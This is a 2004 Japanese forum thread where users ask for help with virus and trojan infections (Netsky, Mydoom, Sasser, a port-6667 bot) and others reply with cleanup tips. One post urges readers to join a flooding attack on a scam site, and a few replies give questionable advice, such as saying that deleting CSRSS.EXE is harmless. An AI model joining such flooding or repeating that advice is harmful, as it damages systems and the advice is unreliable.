1 :
名無しさん@お腹いっぱい。 :
04/09/05 20:27
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html ・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html ・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
10 :
名無しさん@お腹いっぱい。 :04/09/05 20:56
ダークロリータが出てきて速攻消したんですけど大丈夫ですか?
>>10 不安ならアンチウィルスソフトでスキャンすればいいだろ。終了
13 :
名無しさん@お腹いっぱい。 :04/09/06 01:28
パソにあんまり詳しくないものですが、ここ2,3日に約30通以上の ウィルスつきのメールが送られて来てます。 ウィルスバスターで隔離していますが、メールチェックのたびに送られてきていて これはなんなんでしょうか?
>>13 貴方のメアドを登録している知人か誰かのPCがウイルスに感染してしまった。
15 :
名無しさん@お腹いっぱい。 :04/09/06 01:40
>14 その人が気づくまで永遠に送られてくるのでしょうか??
17 :
名無しさん@お腹いっぱい。 :04/09/06 02:17
【祭りのヨカーン】詐欺行為の悪質サイト潰し★3
http://news13.2ch.net/test/read.cgi/news/1094395950/l50 このスレのトップにあるURLを踏むと
>登録しますた。
>15000円の使用料を払ってください。
>個人情報を取得しましたので支払いが無い場合催促しに行きます等の文章とともに銀行の口座番号が表示されます。
これは俗にワンクリック登録などという詐欺行為で金を稼ぐ架空請求です。
今ニュー速板住人が田代砲で爆撃中。落ちたかと思えば復活する難攻不落のサイトとのこと。
協力求む「弾幕薄いぞ何やってんの!!」
>>17 お楽しみに水差して悪いけど、コレって銀行口座までわかってんだから
警察と銀行に通報した方が早くね?うまくすりゃ口座閉鎖に持っていけ
るだろうし。どうせどっかの厨から買った口座だろうから、また変えて
復活するだろうけどさ。
あぁ後「この板ではアタック依頼は受け付けません。」ってことらしいし・・・。
20 :
いなむらきよし :04/09/06 02:38
大地震とかの災害の時には誰が奇形を守ってくれるのかキケー!
ラッキーじゃん!苦労せずにメル鯖立てるなんて
>>17 まだやってたんか
>>18 銀行は警察に通報しると言うだけだし、K札も被害者からの電話じゃないから
相手にしないらしい。
すいません、質問させてください インターネットに繋いだ途端に、コマンドコロンプトみたいなのが一瞬だけ表示され すぐに消えます。(しかも複数) これはトロイに感染されていると考えてもよろしいのでしょうか? 毎回ネットに繋ぐと、常駐ソフトが反応し駆除してるのですが、またネットにつなぎなおすと感染してるようなんです。
25 :
名無しさん@お腹いっぱい。 :04/09/06 15:05
>>24 ルータなりファイヤーウォールなり入れろ。
>>24 トロイに感染してると思ったら、アンチウィルスソフトなりアンチトロイソフトなりで
スキャンしてみれば分かる事じゃねーのか?何で入れもせずに聞くの?
>>23 情報アリガd。どっかで見たか聞いた事を俺が良いように解釈して
記憶してただけみたいだねorz
>>26 スキャンして、感染しているので駆除し、またネットにつなぎなおした途端にまた同じ症状になるのです。
>>28 使っているアンチウィルスソフトは?
他のアンチトロイウェアソフトは試してみた?他の会社のオンラインスキャンは?
何ていうウィルスに感染してるの?
その辺を書かなきゃエスパーじゃなきゃわかるわけないだろ。
30 :
名無しさん@お腹いっぱい。 :04/09/06 19:35
友人のPCがSasserに感染していました。 テンプレのようにしてカウントダウンは止めたんですが、 その後はまずどうすれば良いのでしょう? 友人のPCはほとんど買ったままの状態で、 セキュリティソフト、アンチウィルスソフト等は入っていません。
>>30 >セキュリティソフト、アンチウィルスソフト等は入っていません。
じゃあ入れれば(・∀・)イイ!!
32 :
名無しさん@お腹いっぱい。 :04/09/06 19:46
>>31 サンクス!
でもカウントダウンを止めただけじゃあSasserはまだ駆除出来てないよね?
ウイルスがPCに入ってる状態でノートン先生をインストールしても良いのかな?
34 :
MyDoom被害経験者(当時は深刻) :04/09/06 23:28
>24
ボクのPCもOnSrvr.exeとShrnkwrp.exeがしきりに
ttp:/ads.onwebmedia.comにアクセスをしようとしているんです 。
何回か許せば気が済むかな?と思ったら今でも何回もしつこいです。
Spybotがこれを検出してくれないので、悲しいです。はい。
今も何かのネットワークアクセスに忙しいようで、PCの処理がとっても
重いです。駆除し切れなかった歴代のワームが今夜も活発に暴れている
のかもしれません。
>>36 だな、AVG+Spybot+Outpostユーザーだなどうやら。死んでくれ。
こんな奴が、「AVG検出力ワリーヨ」とか騒いでるんだろうな( ´_ゝ`)y−
どうやら私が思ってた以上に症状はひどいようでした。 カウントダウンは止まるのですが、 インターネットに繋げなくなりました。 その他、アプリケーションの起動が出来なくなり 「デスクトップの更新」をするとほとんどのアイコンがデスクトップから消え、 削除されているなど、どうしようもない状態。 このスレの人ならこの状態になった時はどうするのですか? 私は友人と考えたのですが、何も思いつきませんでした。
>>38 システムの復元ができるXPとかなら、システムの復元かな。
復元不能なら、俺ならリカバリしてアンチウィルスソフトやアンチスパイウェアソフトを
最初から入れてしっかり予防しておく。WindowsUpdateもきっちりやる。
40 :
名無しさん@お腹いっぱい。 :04/09/07 03:05
友人のPCがウイルスに感染したみたいなのですが、 ノートンとバスター(どちらも体験版)でも検索にひっかかりませんでした。 症状としましては、どこからか拾って来た仮装CDファイルをデーモンツールに 入れて起動したらドラクエのデータが消える音と共に画面が 赤くなって動かなくなってしまうみたいです。 何度も再起動しても起動後同じ症状がでるみたいです。 OSはwindows98です。 対処方等知っている方がおられましたらどうかおしえてください。
>>40 Antinnyの新しいウィルスらしいよ。という事で自己責任だろうな。
たぶん、まだどこのアンチウィルスソフトも対応してないと思うよ。
これに懲りたらWinnyはやめとけ、と助言しとけ。
早速のレスありがとうございます。 友人にこのスレの事言っていたので、レスを見たらしくもうしないとメールいれてきました。 この度はありがとうございました。
43 :
名無しさん@お腹いっぱい。 :04/09/07 09:29
友人が〜知人が〜と前振りする香具師の大半は 自分のことを他人に置き換えて質問している
45 :
名無しさん@お腹いっぱい。 :04/09/07 10:25
46 :
名無しさん@お腹いっぱい。 :04/09/07 11:02
>>4 自分にレスしてどうする?とさらに釣られてみる
>>45-46 おまいらはレス先の番号すらまともに書けないのか?
とさらにさらに釣られてみる
>>45 自分で質問できなくて他人に質問させる香具師は氏ね
自分のことなのに他人のことにして質問する香具師はもっと氏ね
ってことだろ
すいません、質問させてください 受信と送信のバイト数が 送信のほうが圧倒的に多いのですが、(ネットに繋げただけで何もしてない状態で) これは何かトロイ系に感染していじられているのでしょうか? AD-awereやavasでスキャンしたときは何も見つからなかったのですが。
>>49 明らかに怪しいな、と思ったら何で他のフリーソフトも試してみないの?
それだけの情報でトロイに感染したかどうかなんてわかるかよ
ファイヤーウォールは入っているのか、何か変なものが接続しようとしてないか?
Spybotは試したのか?アンチトロイウェアソフトは試してみたのか?
51 :
名無しさん@お腹いっぱい。 :04/09/08 09:29
あげ
52 :
名無しさん@お腹いっぱい。 :04/09/08 10:59
誘導されてきました。 OSはXPなんですが、この方法について質問があります。 ■FAQ.4 Q.レジストリエディタをメモ帳に書き換えられてしまいました。どうやったら元に戻せますか? 1.OSのインストールディスクからオリジナルの regedit.exe を探し出す。 ◆XPの場合→インストールディスクの入ったドライブをD:とするとD:\I386\REGEDIT.EXE 2.今あるregedit.exeをオリジナルで上書きする。 ◆XP/2000/Meの場合→C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き >2.今あるregedit.exeをオリジナルで上書きする。 オリジナルまでいって、 「C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き」 がよくわからないんですが、 「C:\Windows\system32\dllcache\regedit.exe」を「C:\Windows\ regedit.exe」に上書きするってことですか?
53 :
名無しさん@お腹いっぱい。 :04/09/08 10:59
Win32/Pariteとかいうのに感染した場合どうすればいいのですか?
>52 2.の文面を読む限り書いてある順番で両方の箇所のregedit.exeを1.のオリジナルで上書きするんだと思うぞ
>53 アンチウイルスソフトで駆除してください
VAIOを買った際にプリインストールされていた、「Norton AntiVirus 2003」を使用しています。 そろそろ更新サービスの期限が切れるので、ストアでキーを購入しようとしているところなんですが…。 この際2004をダウンロード版を買ってアップグレードした方がいいでしょか?
ここはアンチウィルスソフトの相談所じゃねーぞ
>>52 ny関係は
>>1 に書いてある通り、download板に行ってください
ここではお答えできません
60 :
名無しさん@お腹いっぱい。 :04/09/09 00:38
パソコンがウイルス感染したため、クリーンインストールしました。 その後、スクリーンセイバーを設定しようとしたところ、元から入っている、 「60年代アメリカ」と、「サイエンス」というのを見たところ、 台風みたいなのが画面を動き回るのと、ボカシの入った丸いのが画面を 動き回るのでした。 ウイルス関連の書籍でこのようなウイルスもあると読んだことがあるのですが、 このスクリーンセイバーもウイルス感染しているのでしょうか? それとも、元々このようなスクリーンセイバーなのでしょうか? ちなみに、Windows98使用でNECのパソコンを使ってます。
62 :
名無しさん@お腹いっぱい。 :04/09/09 03:25
torjan horseとかいうウィルスに感染しました。 norton anti virus2002を使って駆除しようとしましたができません どうしたらいいでしょうか? 詳しい方教えてください
64 :
名無しさん@お腹いっぱい。 :04/09/09 03:34
感染しているファイルを削除しようとしても 使用中で削除できませんとでてきます
つか、ウイルス名がtrojan horseなの?
66 :
名無しさん@お腹いっぱい。 :04/09/09 03:44
>63 ちなみに感染しているファイルはCSRSS.EXEとCSRSS 2.DLL なんだけど削除して問題ないのかな? ウィルス名 がtrojan horseです
>>66 削除して再起動すれば自動的に新しいファイルが作られる。それでOK.
68 :
名無しさん@お腹いっぱい。 :04/09/09 11:04
YBBってユーザーのウイルス対策どないなってんねん。 3回連絡してその都度対処するっていってんのに2ヶ月以上も 同じユーザーから毎日10以上届くぞ。
>>66 そのウイルス新しいな。いいないいな♪
それはトロイだからレジストリがいじられていて自動的にプログラムが起動されているわけ
んでもってまずはそのプログラム名を探すか、怪しそうなのをみつけて終了させれば削除は可能になる。
次にレジストリの中の
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
から同じようにそのプログラムを実行してるやつを消す。
ノートン先生がちゃんとした削除方法とかを出すまではなんともいえないが
検出されたファイル名(.exe)=プログラム名と考えて
またそのファイルのパスをレジストリでのデータ欄と比べればだいたいみつかる。
>>68 ヤフーに期待するほうがアフォだYO
気長に待つといいYO
72 :
名無しさん@お腹いっぱい。 :04/09/09 15:28
ネットの反応速度が遅い、マウスを動かしてもカーソルがすぐに移動しない、 メール画面にするとすぐにフリーズします。 1週間程まえに5通の不信メールが届きうっかり2通を開けてしまったのですが、 そのメールが届く少しまえからパソコンの調子が変でした。 販売店やメーカーに聞くとウイルスの可能性もあるが、何年もパソコンを使ってると ウイルスでなくても動作に異常が出るのでたまに初期化したほうがいいかも知れない と言われました。 どうすればいいですか? ちなみにさっきパンダのHPに接続しようとしましたが表示されませんでした。
>72 素直にリカバリ
74 :
名無しさん@お腹いっぱい。 :04/09/09 17:31
>70 どうやって怪しそうなプログラムをみつけるの?難しそうだからリカバリーでもいいのかな
>>61 レスありがとうございます。
教えていただいたところで聞いてみます。
返事遅くなってすみませんでした。
wingr32.exe ってのを昨日捕獲しました。 進入方法はサッサーと同じような感じです。オンラインアップデート中にやられました(^^; 最初サッサーかなぁっと思ったのでオンラインスキャンなど試したんですが、検出されませんでした。 さらに拡散するためにサッサーと同じport445を叩いて進入するような動きをみせてました。 port445を使っていたので、完全にサッサーと思い込んでいてそこがミソでしたね。 んで進入後はあやしげなホスト名のport6667へむけてパケットを放出してました。 バックドアにでもしようとしたのでしょうかね? ちなみに 2kでは C:\WINNT\system32 ここにありました。 xpでは c:\windows\system32 にありました。 あとはレジストリの自動実行などにもありました。 あとwinsr32.exeって名前で同じ挙動をしめすのも確認してます。 あとwinxp32.exeだったかな?ってのもありました。 以上参考までに。
質問であります。 オンラインウィルスチェック(トレンドマイクロ)→トロイ発見→HP飛んで指示の通りにスル。 トロイの居場所はドライブCのウインドウズのダウンロードプログラムファイルの中。 で、コレって一時ファイルだっけ?とか思って勝手に ディスククリーンアップ→全部チェック付けて実行。 で、モウ一回 オンラインウィルスチェック→トロイいなくなってた。 でも、ドライブCのウインドウズのダウンロードプログラムファイルの中は変わってナヒ・・・ コレでいいんでしょうか・・・? 不安デス。
1,2行目の間の文が消えてたorz 後はトロイを消すだけだーってトコまできてから、コノ作業をしますた。
何かね、最近、検出されたトロイ名は?とか、どこに検出されたのか具体的に書け!とか 変わってないって具体的にどういうこと?とか、シマンテックのオンラインスキャンもしてみ ろ!とかアンチウイルスソフト常駐中させてねーのかよ!?といったツッコミも書き込む 気力がないんだ・・・。鬱かなぁ・・・。メンヘル版でも逝ってみるか・・・。
偉いスンマセンorz ウインドウズXPホームエディション使ってマス トロイ名はTROJ_ISTBAR.Wで、別名はTR/Dldr.IstBar.PT, アイエスティバー 検出された場所はドライブCのウインドウズのダウンロードプログラムファイルの中デス。 ファイルを開いた時に出てくる中身、が変わってないので、本当に消えたのか心配、という事です。 シマンテックはその後やりましたが、検出されませんでした。 アンチは常駐させてません・・・ 不備非常に申し訳ないです。 というかタブンまだ不備がありそうです・・・お手数かけて申し訳ないorz
>>79 いっそツッコミもテンプレ化したらどうだ?
>>81 オンラインスキャンして検出されないんなら消えたんだろ。
あと、アンチウイルスは必ず入れとけ。
84 :
名無しさん@お腹いっぱい。 :04/09/09 22:49
>>82 【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
↑こんな感じ?別スレのを修正したんだけど。
あぁ〜鬱だぁ〜・・・。
>>85 イキロ…って鬱な人には言っちゃダメなんだっけか?
【使用OS、WindowsUpdateの有無】
【使用AntiVirus、Updateの有無】
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
【これまでにとった措置】
ちょっと修正。
とりあえずテンプレに入れてみるとか。
>>86 ガンガレはだめって聞いたことあるけど、イキロはいいんでないか?
次スレまでまだまだあるから、当面はこの質問テンプレを(回答者の)
必要に応じて使ってもらおうか?
アリガd。
【使用OS】WinXPSP2
【WindowsUpdateしてるか】している。
【AntiVirusは何を使っているか】eTrust、アンチドート。
【ちゃんとUpdateしてるか】している。
【スキャンした結果(ウイルス名・発見場所)】アンチドートで、
C:\〜\Temporary Internet Files\Content.IE5\FGQEOO6Y\stage[1].htm = ウイルス感染 : JS.Milala.a
eTrust:感染なし
【別のオンラインスキャンしたならその結果は】
トレンド:感染なし
シマンテック:感染なし
【症状を具体的に、分かる限りすべて書く】
異常見当たらず。
【何をしたらそんなことになったのか】
分からない。
【これまでにとった措置】
\Content.IE5 を探した。なかった。
「JS Milala」 をググッタ。良く分からなかった。JS.Amilala.aと言われてる人がいた。
>>7 のA.2ので milala を探した。なかった。
【その他の質問】
これなんですか?
どうやって駆除するんですか?
ANTIDOTEはすげえ誤検出多いから、ウイルスと判定してもウイルスじゃないことはよくある
eTrustもアンチドートもよー知らんのだが、アンチウイルスソフト 二つ入れるって、アカンのとちゃうの。
>>90 常駐するものを同時に使う事は出来ないが、
常駐するものと、しないものなら併用出来る。
>85,86 テンプレ乙
95 :
名無しさん@お腹いっぱい。 :04/09/10 13:23
thumbs.dbってトロイに関係あるファイルですか?プログラムファイルの中に見つけてしまった。いつのまに…
>95 >86
母のパソコンがあぼーんしそうなので助けてください。 【使用OS、WindowsUpdateの有無】していない。 【使用AntiVirus、Updateの有無】ウイルスバスター2004 【スキャンした結果(ウイルス名・発見場所)】スキャンしたが発見できず。 【症状】メールやグーグル検索で文字を入力すると、iiiiiiiiiiiiiiiと勝手に 文字を打ってしまうらしいのです。ウイルスなのかも分からない。
99 :
98 :04/09/10 20:49:04
すみません。慌てていたので忘れてしまいました。 OSはMeです。宜しくお願いします。
>>98 ググる母親・・・
まずはキーボードのiのキーを外して、掃除することをお勧めする。
質問です。 ぬるぽにかかったんですが、色々あってリカバリしまして、ぬるぽはなくなりました。 しかし、Dドライブのjpgだけが全て152MBになってて、 「プレビューを利用できません」ってなります。 ノートンでスキャンしても何も検出されませんでした。 どうか解決策を教えてください<(_ _)>
>104 律儀なやつだな
106 :
名無しさん@お腹いっぱい。 :04/09/11 03:15:44
107 :
名無しさん@お腹いっぱい。 :04/09/11 06:53:22
あるホームページの掲示板に頻繁に書き込みをしていました。 (やや辛口のコメントでそれなり反発を買っていたかも) ここ最近 そのサイトを見ているときはなんでもないのですが その後 パソコンの電源を入れた時、ブラウザ(IE)がハングアップ しまいにはネットをつなぐことさえできなくなりました。 パソコンを空にして直すしかなくて(泣)繰り返した結果 どう考えてもそのサイトのアクセス後に不調をきたして いるようにしか思えませんでした。 ネカフェや友達の家のPCからアクセスでは異常なしでした。 が、家にある2台のPCからの時は 異常が起こりました。 そこで質問です。 サイト管理者が 私のネット接続にのみアタックをかける ような設定は可能でしょうか?
108 :
名無しさん@お腹いっぱい。 :04/09/11 07:01:38
107です。ごめんなさい。板間違いだったかも(;;) 初心者質問用スレに移します。 でも もしお答えいただけるなら この手のトラブルが どういうプログラムなのか推察いただけると助かります。 (avast,Outpostセキュで入れています)お願いします。
110 :
名無しさん@お腹いっぱい。 :04/09/11 11:00:30
ウイルスかどうか不明なのですが、会社で下記の症状が出ていたと いうことなのですが、原因の心当たりがあれば、教えてくだされ 【使用OS】WinXP と Win2000 【WindowsUpdateしてるか】一部しているようだが最新にはしていな模様。 【AntiVirusは何を使っているか】Virus Scan 【ちゃんとUpdateしてるか】している。 【スキャンした結果(ウイルス名・発見場所)】 VirusScanでは何も検出されず Norton AntiVirusのお試し版でやっても何も検出せず 【別のオンラインスキャンしたならその結果は】 感染拡大の可能性があるのでやってません 【症状を具体的に、分かる限りすべて書く】 金曜の夕方から発生 lsass.exeの強制終了で再起動が繰り返されたとの証言(私は確認して いないが、複数の目撃証言あり) 複数の部署のパソコンで同様の現象が報告(報告部署には直ぐにネット からの切り離しを依頼) 一部のノートパソコンを収容して起動したところ、上記の症状が2〜 3度確認されるが、その後、症状が消失し、何も異常なし 【何をしたらそんなことになったのか】 不明 ある部署は、あるホームページを見に行った後から異常発生とのこと 【これまでにとった措置】 上記のアンチウイルスソフト以外に、SasserとKorgoの専用駆除ソフトを 試すが、やはり検出されず 新種のウイルスを疑い、シマンテック、トレンドマイクロ、Sophosの ホームぺージを現在までモニターするも、該当しそうなもの無し これってなんなんでしょう
オンラインスキャンしろよ
112 :
名無しさん@お腹いっぱい。 :04/09/11 12:31:48
>>110 とりあえずWindowsUpdateしてオンラインスキャン。それでウイルスいなきゃ多分平気。再起動したから必ずウイルスがいるわけではない。逆に再起動してなくても感染してることもある。
113 :
名無しさん@お腹いっぱい。 :04/09/11 12:34:44
>>110 続き
心配だったら知識のある人にレジストリとスタートアップ見てもらったら?
ウイルスが見つからないならlsass.exeのバグっぽいが。
115 :
名無しさん@お腹いっぱい。 :04/09/11 12:57:11
リンクをはるなあほ 勇気のある人にまかせた↓
>115 ラウンジの鑑定スレいってウイルスだといわれてから >86のテンプレ読んで出直して来い
119 :
名無しさん@お腹いっぱい。 :04/09/11 14:40:48
PCよくわからなくて、WinXPなんですけど この前から初期化されたりいきなり電源切れたり画面が固まったりエラーメッセージ表示されまくったりするんですけど これってなんなのかわかる人いたら教えてくださいorz
>PCよくわからなくて 貴様の言うことがわからんのだよ >86のテンプレ読んで出直して来い
>>115 誤って踏んでしまってPCがひどいことになりました
>>115 さん、謝罪と賠償を
あと通報しときました
122 :
名無しさん@お腹いっぱい。 :04/09/11 16:51:10
トロイの木馬に感染しました。 OSはウインドウズ98です。 どうすれば良いですか?
どいつもこいつも… >85-86のテンプレ読んで出直して来い
>>85-85 のテンプレを読まないやつへのレステンプレ
OSのクリーンインストール
>>124 それだとリカバリCDがどうこう言って来るオチ
127 :
110 :04/09/12 14:51:47
>112-114 どうもあんがと その後、IEで特定サイトに行くとlsass.exeエラーで強制終了が 高確率で出ることがわかりました。あと、Virus Scanもからんでいる 可能性も どうもウイルスではなさそうです
128 :
名無しさん@お腹いっぱい。 :04/09/12 14:56:49
【使用OS、WindowsUpdateの有無】 WinXP。SP2はDLに失敗するのでまだいれてませんでした。 【使用AntiVirus、Updateの有無】 フリーのAntiVir Guard。アップデートはおとといしました。 【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も) 上記ソフトでは何も出てきませんでした。 タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり、 終了させようとすると「重要なシステム プロセスです。〜」と出て終了できません。 【症状】 起動中でない全てのファイルが削除されました。 システムファイルが書き換えられているか(WinXPの?)CDを入れろという旨の警告も沢山出てきました。 迂闊に電源落とすと起動できなくなりそうなので敢えて放置してますが、 OSのインストールされていないドライブは98%空っぽになってます。 フォルダはおそらく一切削除されていません。 複数のことをしてたので原因は断定はできませんが、 友人からもらったCD-Rの中身を見たりインストールしてる最中でした。 インターネットには接続してました。 メールは症状の出る30分ぐらい前に見てましたがBecky!2というシェアウェアを使用しています。 【これまでにとった措置】 データ復元ソフトで復元を試みていますが、 活動を行っている元凶がわからず上記の怪しいプロセスも終了できないため、 復帰してもまた消されるんじゃないだろうか?という状態です。 今はノートで接続して書き込んでいます
間違いなくトロイにひっかかったっぽいんですが、 一部バックアップを取っていないファイルがあって、 最終的に一度まっさらにするにしてもそれを復元して救出したいので、 なんとか破壊活動をとめたいのですが、どうかご指南ください
あ、すいません、128=129です。
whiter系即時発動型みたいだな・・・ データ復元ソフトで復元できるもんなの? 教えてエロ意人!
>>128 >タスクマネージャを見るとwinlogonという妙にCPUを使うプロセスがあり
winlogonは無害です
バックアップをとる前に「msconfig」を実行!
怪しげなサービスやスタートアップは削除もしくは停止!
バックアップ → クリンインスコを勧めます・・・・ってかノートン先生を勧めるが。。。
バックアップするときは「msconfig」で全てのサービスやスタートアップを無効にして
セーフモードでバックアップを勧めます!
133 :
名無しさん@お腹いっぱい。 :04/09/12 17:38:18
outlookで使っているホットメールのアカウントに、 普通の人からと思われるメールで、 「念のために返信しますが、どちらさまでしょうか? 知人のいたずらですか?」 という旨のメールが送られてきました。 実は似たようなメールが前にも来ました。 ノートン使ってて、アップデートしてから検索したけど、ウイルスは引っかからないし・・・ どうすればいいでしょう・・・。
SPAMでつムシムシ
135 :
名無しさん@お腹いっぱい。 :04/09/12 17:51:11
質問です。 このところPCを立ち上げると、勝手にネットに接続してしまったり、 ネットを開くと見たこともないページが出てきたり、違うページに飛んでしまったり。 あと勝手に強制終了になったり・・。 なので店に行って状況を話したところウイルスではないと言われ、PESTPATROLを購入しました。 しかしいざCDを入れてダウンロードしようとすると、ダウンロード出来ませんとなってしまい ずっと放置しています。 説明書に「Administrator権限のあるユーザーで行う必要がある」と書いてあったので、 セーフモードで立ち上げて、Administratorでログインして試みましたが結果は変わらず・・ どなたかPESTPATROLのインストールのやり方分かる方いらっしゃいませんか? ちなみにWINDOWS XP HOME Editionです。
ログインしようとすると即ログオフされてしまいます。 これって何かのウイルスに感染したんでしょうか? また対策はどうすればいいんでしょう?
>>135 コントロールパネル→ユーザーアカウント→アカウントを変更する→自分のアカウントを選ぶ
アカウントの種類を変更する→「コンピュータの管理者」にチェック→再起動
で、できないかなぁ・・・。
138 :
135 :04/09/12 18:18:27
>>137 ありがとうございます。
早速やってみたんですが、既にコンピュータの管理者にチェックがついてました;
139 :
135 :04/09/12 18:22:03
ちなみにダウンロード用のCDを入れると、 16ビットWINDOWSサブシステム システムファイルはアプリケーションを実行するのに適していません。 アプリケーションを終了するには閉じるを選んでください。 と出ます・・。
>>139 先にスパイウェア駆除しないとインストールできないだろうよ
>>139 サービスのWindows Installerは開始している?
142 :
135 :04/09/12 18:44:01
>>140 ペストパトロールをインストールすればスパイウェアとかハッカーツールも削除出来ると、
店の人が言ったので買ったんですが肝心のCDを入れてダウンロードしようとするとこんなんで…;
143 :
135 :04/09/12 18:45:48
>>141 それはどういったものですか??
多分してないです。
インストール時のトラブル! まず[ファイル名を指定して実行]−[msconfig]を実行 − [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動 「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行 [Windows Installer]を開始にする。 これで終わり、通常どぉりインストール・・・・・出来ると思う。。。
145 :
135 :04/09/12 19:15:06
>>144 今途中までやってみたんですが、
まずMS以外の物を無効にするというのは
どれを無効にすればいいんでしょうか。チェックを外せばいいんですよね??
あとInstallerを実行中にするにはシステム構成ユーティリティの中でどのような操作をすればよいのでしょうか?
何度もお手数をおかけしてすみません。
>>145 セーフモードではネットに接続出来ないよな
147 :
135 :04/09/12 19:32:09
> まず[ファイル名を指定して実行]−[msconfig]を実行 >− [サービス]+[スタートアップ]のMS以外の物を無効化してOS再起動 [サービス]+[スタートアップ] ・スタートアップは「全て無効ボタン」でOK ・サービスは「Microsoftのサービスを全て隠す」にチェックで出てきた 項目のチェックを外す > 「Admin権限でログイン」−[ファイル名を指定して実行]−[services.msc]を実行 >[Windows Installer]を開始にする。 ここ重要!必ず「コンピュータの管理者」でログイン そして、[ファイル名を指定して実行]−[services.msc]−Windows Installerを探す(必ずある!) Windows Installerをダブルクリック「自動」+「開始」を実行 通常どぉりインストール!
149 :
名無しさん@お腹いっぱい。 :04/09/12 20:32:27
150 :
名無しさん@お腹いっぱい。 :04/09/12 20:33:09
>>136 レジストリのユーザーハイブの破損です
セーフモードでAdministratorにログインして
新規にユーザーアカウントを作る
それすら不可能なら、修復インストールしかない
152 :
135 :04/09/12 21:16:41
>>148 丁寧な説明ありがとうございます^^
その通りに全部やっていざインストール用のCDを入れたらやはり下のような
メッセージが・・・。もう駄目なんですかね;
このペストパトロールのソフトを出しているネットジャパンという会社がサポート
をやっているんですが、月〜金の間だけでその間仕事をしている私は聞くに聞けないし;
[16ビットWINDOWSサブシステム
システムファイルはアプリケーションを実行するのに適していません。
アプリケーションを終了するには閉じるを選んでください。]
154 :
135 :04/09/12 21:33:05
>>153 そうですね;
ビッ○カメラに聞いてみます;
本当にいろいろありがとうございましたm(_ _)m
自宅のです。 今は携帯からカキコです。 よみにくてごめんなさい。 一応試してみます。
ここは相当スキルのある人が多いようなので、板違い かもしれませんが、どうかここで質問させてください。 メ−ル配信(合法の未承諾広告配信)について 詳しい方いましたら、教えていただきたいのですが、 どうしても販売したい商品があり、1ヶ月間だけ メ−ル配信をしたいのですが、 ご存知の通りスパム規制などで、プロバイダーの 対応が厳しく、現在では合法の方法でさえ送信する手段が 全くありません。 調べるところがないほど調べましたが、 全くと言っていいほど手段が見つからずとても悩んでいます。 プロバイダーのSMTPサ−バ−を通さずにパソコンをサ−バ−にして 送信しても、苦情があれば即プロバイダーから警告がきて アウトです。つまり現在のメ−ル配信は よほどのスキルのある人でしか不可能なようです。 そこでお聞きしたいのですが、コンスタントに メ−ル配信ができる方法があれば、どうか教えてください。 あつかましいお願いで申し訳ありませんが、 必死なのでどうかお願いいたします。 またメールのヘッダを変えて送信する方法なども 調べているのですが、かなり難しくて自分では分かりません。 分かる方いましたら、どうか教えてください。 ※もしよければメ−ルにてご連絡いただけますと幸いです。
>>156 ネタか? ただのアホか?
そんなもん送ってほしいやつはいねー。誰が教えてやるか!
>>156 未承諾広告で客を捕まえようという発想を辞めればいいんじゃないかな
終 了
>>156 「未承諾広告」なんてメールが来たって、誰も読みゃしねえ。
いい物を、本当に売りたいなら別の手を考えな。
図々しいスパマ〜だな〜氏んでください
161 :
名無しさん@お腹いっぱい。 :04/09/13 15:53:24
